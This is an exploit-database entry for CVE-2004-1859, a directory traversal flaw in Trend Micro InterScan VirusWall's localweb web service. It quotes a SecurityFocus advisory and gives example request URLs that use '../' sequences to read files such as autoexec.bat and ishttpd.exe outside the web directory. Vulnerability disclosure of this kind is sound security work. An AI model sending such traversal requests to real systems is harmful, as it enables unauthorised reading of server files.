Trend Micro Interscan VirusWall localweb - Directory Traversal



EKU-ID: 29301 CVE: CVE-2004-1859;OSVDB-4549 OSVDB-ID:
Author: Tri Huynh Published: 2004-03-24 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/9966/info

It has been reported that InterScan VirusWall may to a directory traversal vulnerability that may allow an attacker to request files from the '/ishttp/localweb' directory and any sub directories of 'localweb' with directory traversal strings such as '../'.

http://www.example.com/ishttpd/localweb/filename
http://www.example.com/ishttpd/localweb/java/?/../../../../../../../../autoexec.bat
http://www.example.com/ishttpd/localweb/java/?/../../../ishttpd.exe